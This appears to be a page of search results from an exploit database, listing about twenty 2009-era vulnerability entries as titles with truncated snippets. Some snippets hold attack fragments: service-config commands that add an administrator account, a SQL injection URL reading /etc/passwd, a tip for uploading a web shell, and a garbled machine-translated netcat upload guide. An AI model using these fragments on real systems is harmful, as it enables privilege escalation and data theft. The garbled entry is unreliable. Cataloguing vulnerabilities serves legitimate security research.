1634 matches found
phpMDJ 1.0.3 - SQL Injection
Vulnerable Script : phpMDJ 1.0.3 | Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip | Vulnerability : Remote Sql Injection...
DS CMS 1.0 - 'NewsId' SQL Injection
Script : DS CMS 1.0 NewsId Remote SQL Injection Vulnerability | Script site : http://cms.dsinternal.com/Home | AUTHOR : Palyo34 | HOME : http://www.1923turk.biz | Exploit...
DieselPay 1.6 - Cross-Site Scripting / Directory Traversal
source: https://www.securityfocus.com/bid/37564/info DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker could exploit these vulnerabilities to obtain sensitive information,...
Webring - Cross-Site Scripting
Webring - Cross-Site Scripting | Title : webring Cross Site Scripting Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria...
Quiz - Cross-Site Scripting
Title : quiz Cross Site Scripting Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | EDB-ID : 10679 |...
Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)
Uploader by CeleronDude 5.3.0 - Upload Vulnerability Discovered by : Stink' Date : 2009-12-17 Dork : "Uploader by CeleronDude." Website Publisher : http://www.celerondude.com/php-uploader-v5 -- Upload Vulnerability -- Rename your shell.php in shell.php.pjpeg and Upload ! Example for admin :...
Zeecareers 2.0 - Cross-Site Scripting Authentication Bypass
Zeecareers 2.0 - Cross-Site Scripting Authentication Bypass source: https://www.securityfocus.com/bid/41689/info Zeecareers is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities. An attacker may leverage the cross-site scripting issue to execute...
XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability
No description provided by source. Date of Discovery: 24-Nov-2009 Credits:leinakesiatgmail.com Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root...
PHP and ASP upload vulnerability exploit-vulnerability warning-the black bar safety net
1 pass exploit the principles just for the form format of the upload of asp and php scripts ncnetcat For the submission packet the dos interface to run under: nc-vv www.. com 8 01.txt -vv: echo 8 0: the www port 1.txt: is your data packet to be transmitted use of more methods, please check this...
Home FTP Server 'MKD' Command Directory Traversal Vulnerability
Date of Discovery: 17-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server is an easy use FTP server Application. Directory Traversal...
Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability
Date of Discovery: 16-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server FTP Server is an easy use FTP server Application. Denial of...
Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service
Exploit Title: Home FTP Server 1.10.1.139 'SITE INDEX' Command Remote Denial of Service Vulnerability Date: 16 Nov 09 Author: zhangmc Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe Version: Home FTP Server 1.10.1.139 Tested on: relevant os Code : From: zhangmc mail...
tomcat: XSS in Apache Tomcat calendar application
Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, relat...
Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /ad...
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation
No description provided by source. To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add net...
SUSE: Security Summary (SUSE-SR:2009:017)
The remote host is missing updates announced in advisory SUSE-SR:2009:017. SuSE Security Summaries are short on detail when it comes to the names of packages affected by a particular bug. Because of this, while this test will detect out of date packages, it cannot tell you what bugs impact which...
SLES9: Security update for Apache2
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: apache2-worker apache2-prefork apache2-example-pages apache2 apache2-devel apache2-doc libapr0 For more information, please visit the referenced security...
SLES9: Security update for XFree86-server
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: XFree86-Xnest XFree86-Xvfb XFree86-server More details may also be found by searching for keyword 5012942 within the SuSE Enterprise Server 9 patch database...
Cour Supreme - SQL Injection
Cour Supreme - SQL Injection | Discovered By: CrAzY CrAcKeR | Email: CrAzYCrAcKeRathotmaildotcom | example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select...
cour supreme 'index.php' SQL Injection & Local File Include Vulnerability
Discovered By: CrAzY CrAcKeR | Email: CrAzYCrAcKeRathotmaildotcom | example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,loadfile'/etc/passwd',8+from+mysql.user...